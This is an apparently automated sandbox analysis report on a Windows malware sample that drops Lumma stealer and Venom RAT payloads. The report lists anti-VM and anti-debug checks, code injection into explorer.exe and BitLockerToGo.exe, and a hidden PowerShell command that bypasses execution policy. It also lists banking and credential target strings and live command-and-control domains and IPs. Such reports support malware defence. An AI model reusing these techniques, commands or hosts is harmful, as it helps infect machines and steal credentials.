Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7684	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6464	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 3172	Thread sleep count: 4884 > 30
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 7680	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6244	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe

Code function: 24_2_00007FF70B8D7000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF70B8D71AFh

24_2_00007FF70B8D7000

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00BA1754h		5_2_00BA1718
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00EE1754h		17_2_00EE1718

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		5_2_00BA29E2
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		17_2_00EE29E2

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Code function: 5_2_00BA2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

5_2_00BA2B8C

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
Source: B552.exe, 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl;~%
Source: IXDaI.exe, 00000005.00000002.1466246003.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1330174994.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1337998846.000000000118B000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000002.1466246003.0000000001168000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.000000000952D000.00000004.00000001.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3739679273.0000000000575000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3755459555.0000000005590000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTbrVMWare
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: wscript.exe, 00000028.00000002.2753282593.0000022B5D5A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: B552.exe	Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: 753F.exe, 0000001C.00000002.2799563492.000001C0F766A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2608130917.0000020A00056000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: lm.exe, 00000026.00000003.2669341057.0000000003218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\x
Source: wscript.exe, 00000028.00000002.2753282593.0000022B5D5A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: B552.exe, 0000001B.00000002.2355425159.0000023B1B108000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTS'P
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: lm.exe, 00000026.00000002.2885932416.0000000000645000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8gh%SystemRoot%\system32\mswsock.dll
Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

API call chain: ExitProcess graph end node

graph_5-1022

Source: C:\Users\user\Desktop\7Y18r(14).exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\7Y18r(14).exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\7Y18r(14).exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	System information queried: CodeIntegrityInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\753F.exe

Code function: 28_2_00007FF7C08C3238 CheckRemoteDebuggerPresent,

28_2_00007FF7C08C3238

Source: C:\Users\user\Desktop\7Y18r(14).exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02EE9D10 LdrInitializeThunk,

31_2_02EE9D10

Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_004C5044 mov eax, dword ptr fs:[00000030h]	4_2_004C5044
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_0060092B mov eax, dword ptr fs:[00000030h]	4_2_0060092B
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00600D90 mov eax, dword ptr fs:[00000030h]	4_2_00600D90
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_006E05EE push dword ptr fs:[00000030h]	4_2_006E05EE
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_004C5044 mov eax, dword ptr fs:[00000030h]	16_2_004C5044
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_0050F68E push dword ptr fs:[00000030h]	16_2_0050F68E
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_0067092B mov eax, dword ptr fs:[00000030h]	16_2_0067092B
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00670D90 mov eax, dword ptr fs:[00000030h]	16_2_00670D90

Source: C:\Users\user\AppData\Local\Temp\753F.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: ftejced.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.168.53.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 127.0.0.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.165.133.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

.NET source code references suspicious native API functions

Source: 753F.exe.14.dr, SAPIENHost.cs	Reference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
Source: 37.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 37.2.vm.exe.4e40000.1.raw.unpack, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 37.2.vm.exe.4e40000.1.raw.unpack, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory allocated: C:\Windows\explorer.exe base: 81C0000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory allocated: C:\Windows\explorer.exe base: B30000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory allocated: C:\Windows\explorer.exe base: 8920000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory allocated: C:\Windows\explorer.exe base: 8940000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\753F.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe

Memory protected: C:\Windows\explorer.exe base: 81C0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\7Y18r(14).exe	Thread created: C:\Windows\explorer.exe EIP: B019D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	Thread created: unknown EIP: 81819D0

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\B552.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: PID: 3968 base: 81C0000 value: 20
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: PID: 3968 base: 81C1000 value: 48
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Memory written: PID: 3968 base: 8940030 value: 00

LummaC encrypted strings found

Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
